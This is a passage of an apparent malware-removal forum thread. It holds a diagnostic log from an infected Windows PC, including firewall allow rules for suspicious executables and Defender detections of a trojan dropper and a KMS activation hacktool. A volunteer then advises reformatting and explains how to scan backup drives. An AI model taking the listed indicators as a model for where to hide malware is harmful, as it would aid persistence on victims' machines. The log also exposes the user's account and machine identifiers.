FirewallRules: [UDP Query User{1E197E1F-0BF8-4B89-A1AD-75A18CA347C6}D:\counter-strike 1.6 (2017-06-27)\hl.exe] => (Allow) D:\counter-strike 1.6 (2017-06-27)\hl.exe
FirewallRules: [TCP Query User{12BFC6DA-0C7C-42E5-BA5B-652F282907F3}D:\cs16-2017\hl.exe] => (Allow) D:\cs16-2017\hl.exe
FirewallRules: [UDP Query User{F198ED93-91AD-43A0-B1B1-94B618834E36}D:\cs16-2017\hl.exe] => (Allow) D:\cs16-2017\hl.exe
FirewallRules: [TCP Query User{3A16ECEB-E54C-42A6-98AA-B04277D363D1}D:\counter-strike-2.0\hl.exe] => (Allow) D:\counter-strike-2.0\hl.exe
FirewallRules: [UDP Query User{EC96ABF2-80E7-474A-88E5-4CF025197D92}D:\counter-strike-2.0\hl.exe] => (Allow) D:\counter-strike-2.0\hl.exe
FirewallRules: [TCP Query User{F6A063E0-5472-4A28-B682-7D6D6FC08569}D:\counter strike amd\hl.exe] => (Allow) D:\counter strike amd\hl.exe
FirewallRules: [UDP Query User{634FA95F-3157-4857-B703-A8CC221BCDE9}D:\counter strike amd\hl.exe] => (Allow) D:\counter strike amd\hl.exe
FirewallRules: [TCP Query User{9AA7CCC2-E540-4F33-B89B-A48F43253AE6}D:\counter-strike\hlds.exe] => (Allow) D:\counter-strike\hlds.exe
FirewallRules: [UDP Query User{E492235D-CC67-4D6E-A0EA-A77F91589D62}D:\counter-strike\hlds.exe] => (Allow) D:\counter-strike\hlds.exe
FirewallRules: [TCP Query User{2E4C58EF-0615-4E9F-97F0-6A720251CB54}D:\counter-strike 1.6 non steam\hl.exe] => (Allow) D:\counter-strike 1.6 non steam\hl.exe
FirewallRules: [UDP Query User{EB4E7949-A48B-4EF1-8203-0B384D426B1B}D:\counter-strike 1.6 non steam\hl.exe] => (Allow) D:\counter-strike 1.6 non steam\hl.exe
FirewallRules: [TCP Query User{44580F86-4370-4140-A624-7E9A22FB9984}C:\users\craciun\appdata\local\warthunder\launcher.exe] => (Allow) C:\users\craciun\appdata\local\warthunder\launcher.exe
FirewallRules: [UDP Query User{01ECB409-A03D-41D7-AD28-538D48DC19DA}C:\users\craciun\appdata\local\warthunder\launcher.exe] => (Allow) C:\users\craciun\appdata\local\warthunder\launcher.exe
FirewallRules: [TCP Query User{4FF6BF3C-F33A-4A94-A1E5-E586B0A524F6}D:\world_of_tanks\wotlauncher.exe] => (Allow) D:\world_of_tanks\wotlauncher.exe
FirewallRules: [UDP Query User{D3BB54F5-168D-4D17-8166-2FB86DF03E05}D:\world_of_tanks\wotlauncher.exe] => (Allow) D:\world_of_tanks\wotlauncher.exe
FirewallRules: [{2644CEA2-83F3-4AD6-8A63-575748B365FD}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{F380ADBE-E45F-42F6-ADB2-9188D4CB6D95}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{6C295877-089D-4BCD-A967-8DA1A49B24A0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E1462106-F38C-4A69-BDF4-7950C204B408}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{1030C0E4-423F-4B6A-A49E-947C0C10FFB3}D:\nvidia steam counterstrike 2016 update\nsteam counter-strike\hl.exe] => (Allow) D:\nvidia steam counterstrike 2016 update\nsteam counter-strike\hl.exe
FirewallRules: [UDP Query User{B4FF98E5-08A3-412E-A469-6EBCD505E6F0}D:\nvidia steam counterstrike 2016 update\nsteam counter-strike\hl.exe] => (Allow) D:\nvidia steam counterstrike 2016 update\nsteam counter-strike\hl.exe
FirewallRules: [TCP Query User{D5146035-5584-4567-83C9-397FD5C299D7}C:\users\craciun\desktop\cs16-2017\hl.exe] => (Allow) C:\users\craciun\desktop\cs16-2017\hl.exe
FirewallRules: [UDP Query User{CB159496-17DD-48CF-8885-4B0E8B7D9135}C:\users\craciun\desktop\cs16-2017\hl.exe] => (Allow) C:\users\craciun\desktop\cs16-2017\hl.exe
FirewallRules: [TCP Query User{795136A0-292E-4FB2-BA31-76E85FAF71C2}D:\cs warzone\hl.exe] => (Allow) D:\cs warzone\hl.exe
FirewallRules: [UDP Query User{39E52562-6100-48D6-8689-D6ECC0DB27FD}D:\cs warzone\hl.exe] => (Allow) D:\cs warzone\hl.exe
FirewallRules: [TCP Query User{28B2DC52-BD92-404E-B53C-3A0D54607ECB}D:\counter-strike clean edition\hl.exe] => (Allow) D:\counter-strike clean edition\hl.exe
FirewallRules: [UDP Query User{023FEE50-184F-499A-B1C9-EA173596D789}D:\counter-strike clean edition\hl.exe] => (Allow) D:\counter-strike clean edition\hl.exe
FirewallRules: [{78833D12-C4E1-49DB-A6CC-1AEF4B9DB449}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{E42C9B74-0FFF-459F-90E7-32D0CFA0C605}] => (Allow) C:\WINDOWS\rss\csrss.exe
FirewallRules: [{F7E482B2-8AAB-4F18-98AA-7FC08217FBDF}] => (Allow) C:\Program Files\SystemaRev\RevServicesX\updaterev.exe
FirewallRules: [{EAB1E333-B6C7-463E-BC94-25E572390F20}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{04232483-4B52-4D20-B3B7-A60625DC60E9}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{CEE15CAE-5D72-46C6-A8E2-444FD75D2150}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{1A7809BC-2259-436F-AD75-73E56F135B67}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{7C704E6D-C340-45D5-9BC6-87E074B815C1}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{906035DF-C0AE-44E6-B3D8-2739D9364555}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{5016DA15-A0F7-4EE1-9E1A-1956C2D130B6}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{CA6B358D-C468-4EB1-AAA3-C59DF4094729}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{CE9844A6-FB3B-484C-AAB0-4E55FF88EC05}] => (Allow) C:\Program Files\SystemaRev\RevServicesX\app.exe
FirewallRules: [{3F88C8DA-33D7-464D-8F61-CD88E01FA02C}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{586AD05E-B353-4E2B-AC8A-17296870377C}] => (Allow) C:\Windows\System32\rundll32.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/11/2018 09:30:30 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Music.UI.exe version 10.18011.1341.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 61f0
 
Start Time: 01d4014da09f77cd
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.18011.13411.1000_x64__8wekyb3d8bbwe\Music.UI.exe
 
Report Id: 2bca29e2-88a1-49bb-acba-c9522ddc8ed6
 
Faulting package full name: Microsoft.ZuneMusic_10.18011.13411.1000_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: Microsoft.ZuneMusic
 
Error: (06/11/2018 08:24:26 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wmplayer.exe version 12.0.17134.1 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 43c4
 
Start Time: 01d40141ba5e7d46
 
Termination Time: 4294967295
 
Application Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
 
Report Id: 910517d4-e606-4ffe-b952-a20a8c38bc2d
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (06/10/2018 12:05:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: gC4AF.tmp.exe, version: 0.0.0.0, time stamp: 0x5b00ca1a
Faulting module name: gC4AF.tmp.exe, version: 0.0.0.0, time stamp: 0x5b00ca1a
Exception code: 0xc0000409
Fault offset: 0x00000000000067bc
Faulting process id: 0x3058
Faulting application start time: 0x01d4009a10ca84a5
Faulting application path: C:\Windows\TEMP\gC4AF.tmp.exe
Faulting module path: C:\Windows\TEMP\gC4AF.tmp.exe
Report Id: 47597da1-b3d2-4197-a40d-bc85f2922f94
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/10/2018 12:01:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Faulting module name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Exception code: 0xc0000409
Fault offset: 0x0001578c
Faulting process id: 0xdd4
Faulting application start time: 0x01d40099294aad24
Faulting application path: C:\ProgramData\yahoochrome_D\desktop245.exe
Faulting module path: C:\ProgramData\yahoochrome_D\desktop245.exe
Report Id: e390688c-5819-4ad1-98b2-5f5392466625
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/09/2018 06:41:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: gC4AF.tmp.exe, version: 0.0.0.0, time stamp: 0x5b00ca1a
Faulting module name: gC4AF.tmp.exe, version: 0.0.0.0, time stamp: 0x5b00ca1a
Exception code: 0xc0000409
Fault offset: 0x00000000000067bc
Faulting process id: 0x2728
Faulting application start time: 0x01d40007cb8406bf
Faulting application path: C:\Windows\TEMP\gC4AF.tmp.exe
Faulting module path: C:\Windows\TEMP\gC4AF.tmp.exe
Report Id: ec5fbacf-5aaf-474e-9951-5a26bb83764d
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/09/2018 06:33:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Faulting module name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Exception code: 0xc0000409
Fault offset: 0x0001578c
Faulting process id: 0xcec
Faulting application start time: 0x01d40006f3190882
Faulting application path: C:\ProgramData\yahoochrome_D\desktop245.exe
Faulting module path: C:\ProgramData\yahoochrome_D\desktop245.exe
Report Id: 5a5f4840-ad8d-4b7b-a1ba-1b2c5ee16884
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/09/2018 06:27:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Faulting module name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Exception code: 0xc0000409
Fault offset: 0x0001578c
Faulting process id: 0xd70
Faulting application start time: 0x01d400060a6ff92d
Faulting application path: C:\ProgramData\yahoochrome_D\desktop245.exe
Faulting module path: C:\ProgramData\yahoochrome_D\desktop245.exe
Report Id: 7d5f3b74-4188-40e4-acb9-87779df3e92e
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/09/2018 06:20:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Faulting module name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Exception code: 0xc0000409
Fault offset: 0x0001578c
Faulting process id: 0xcb4
Faulting application start time: 0x01d40004b4062331
Faulting application path: C:\ProgramData\yahoochrome_D\desktop245.exe
Faulting module path: C:\ProgramData\yahoochrome_D\desktop245.exe
Report Id: 26c1c58a-072f-48ef-b0e2-666140d7fcee
Faulting package full name: 
Faulting package-relative application ID:
 
 
System errors:
=============
Error: (06/11/2018 09:15:53 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:57:47 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:45:40 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:39:39 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:33:36 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:27:53 PM) (Source: DCOM) (EventID: 10010) (User: ALEX-PC)
Description: The server Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXfbn8w4s0jbk3tjevpcn9kaxerc6rby8k.mca did not register with DCOM within the required timeout.
 
Error: (06/11/2018 08:27:43 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:27:33 PM) (Source: DCOM) (EventID: 10001) (User: ALEX-PC)
Description: Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI as Unavailable/Unavailable. The error:
"5"
Happened while starting this command:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 
 
Windows Defender:
===================================
Date: 2018-05-24 08:32:40.439
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: High
Category: Tool
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
Date: 2018-05-24 08:32:18.750
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: TrojanDropper:Win32/Kaymundler.C
ID: 2147709830
Severity: Severe
Category: Trojan Dropper
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit Final.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\System32\SearchProtocolHost.exe
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
Date: 2018-05-24 08:32:09.270
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: TrojanDropper:Win32/Kaymundler.C
ID: 2147709830
Severity: Severe
Category: Trojan Dropper
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit Final.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Program Files\WinRAR\WinRAR.exe
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
Date: 2018-05-24 08:29:42.219
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: High
Category: Tool
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe;file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe->[SAResource]->[MSILRES:?.?.resources]
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Windows\explorer.exe
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
Date: 2018-05-24 08:27:10.517
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: High
Category: Tool
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe;file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe->[SAResource]->[MSILRES:?.?.resources]
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Windows\explorer.exe
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
==================== Memory info =========================== 
 
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 87%
Total physical RAM: 3985.8 MB
Available physical RAM: 492.68 MB
Total Virtual: 10897.8 MB
Available Virtual: 1926.87 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:96.71 GB) (Free:54.19 GB) NTFS
Drive d: () (Fixed) (Total:200.43 GB) (Free:104.31 GB) NTFS
 
\\?\Volume{7efd9163-b9ab-11e6-9350-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{000cbde6-0000-0000-0000-f03318000000}\ () (Fixed) (Total:0.84 GB) (Free:0.37 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 000CBDE6)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=96.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=865 MB) - (Type=27)
Partition 4: (Not Active) - (Size=200.4 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#4 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,372 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:43 AM

Posted 11 June 2018 - 09:12 PM

Greetings Alex.
 
Unfortunately your computer is infected with a Backdoor Trojan. In addition there is evidence of illegal software on your computer.
 
This is the most highly infected computer I have come across in years. I would advise you to immediately disconnect from the Internet to prohibit others from accessing your personal information.
 
Your computer is compromised to the point that you will have to reformat and reinstall the operating systems and programs. It simply can't be cleaned and even if we tried I would still advise you to never trust it and never have personal information on it.
 
Please let me know if you need assistance in the reformat/reinstall. There is no other option.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."

#5 D3AtH


Posted 12 June 2018 - 07:48 AM

Oh... Then I think I am going to reformat and reinstall the operating system.

Thank you for your help, because of you now I know what to do. And I can manage to reformat and reinstall the operating system.

Thanks again for your assistance, Gary.



#6 Oh My!


Posted 12 June 2018 - 08:03 AM

You are welcome. I will close the topic shortly but feel free to send me a Personal Message if I can be of assistance.

If you want to save data files (music, pictures, documents, etc.) in order to reintroduce them into your clean computer I would recommend you scan the external device containing the files before ever transferring them back. In anticipation of that let me leave you with these options. Pay particular attention to the external drive portion of each set of instructions.

===================================================

Malwarebytes Anti-Malware Including External Drive Option

----------
  • If Malwarebytes is already installed launch the program, update the database if necessary, attach any external drives you want to scan, and go directly to the Scan instructions below
  • If Malwarebytes is not installed download Malwarebytes Anti-Malware and save it to your desktop
  • Right click the desktop icon and select Run as administrator
  • Click OK for English, then click Next
  • Select I accept the agreement then continue to click Next then finally click Install
  • Uncheck Enable free trial of Malwarebytes Anti-Malware Premium if you do not want the free trial of the paid version, then click Finish
  • If you are notified the Database is out of date click Update Now
  • Hold down the Shift key then attach any external drives you want to scan
  • Click the Scan button near the top
  • Select Custom Scan then click Configure Scan
  • Place a check mark in Scan for rootkits, Scan Startup and Registry Settings, the C: drive, and any additional drives you would like to scan
  • Click Scan now
  • Note: If Malwarebytes will not launch stop and let me know
  • When completed review the Scan Results list and uncheck any items you want to keep (if there are identified items)
  • Click Quarantine threats
  • If requested restart your computer
  • Relaunch Malwarebytes
  • Click the Reports tab
  • Place a check mark in the most recent Scan Report then click View Report
  • Click Export, then select Text File (/txt)
  • Save the file on your Desktop as MBAM.txt
  • Copy and paste the contents of the report in your reply
===================================================

ESET Online Scanner Including External Drive Option

--------------------

I'd like us to scan your machine with ESET OnlineScan. This process may take several hours, that is normal.
  • Download esetsmartinstaller_enu.exe and save it to your Desktop
  • Right click on the icon and select Run as administrator
  • Check YES, I accept the Terms of Use
  • Click the Start button
  • Accept any security warnings from your browser
  • Allow the downloading of components
  • Hold down the Shift key then attach any external drives you want to scan
  • Click Advanced settings
  • Check the following items:
      • Enable detection of potentially unwanted applications
      • Remove found threats
      • Scan archives
      • Scan for potentially unsafe applications
      • Enable Anti-Stealth technology
  • Click Change next to Current scan targets:
  • Place a check mark in any additional drive you wish to scan then click OK
  • Click Start
  • ESET will then download updates and begin scanning your computer
  • If no threats are found simply click Uninstall application on close and hit Finish
  • If threats are found click List of found threats
  • Click Export to text file
  • Save the file on your Desktop as ESET.txt
  • Click Back
  • Click Finish
  • Close the ESET Online Scanner window
  • Copy and paste the contents of ESET.txt in your reply
===================================================

Keeping Your Computer Safe

----------

Please take the time to read below on how to secure the machine and take the necessary steps to keep it clean.

Lawrence Abrams, the founder of BleepingComputer.com, has developed an excellent tutorial which will provide you with the information you need to know to keep your computer secure and clean. Please take the time to read:

In addition, here are some more links you might find of interest:

Thank you for placing your trust in BleepingComputer. It was a pleasure serving you.
Gary
 

#7 Oh My!


Posted 12 June 2018 - 08:29 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 



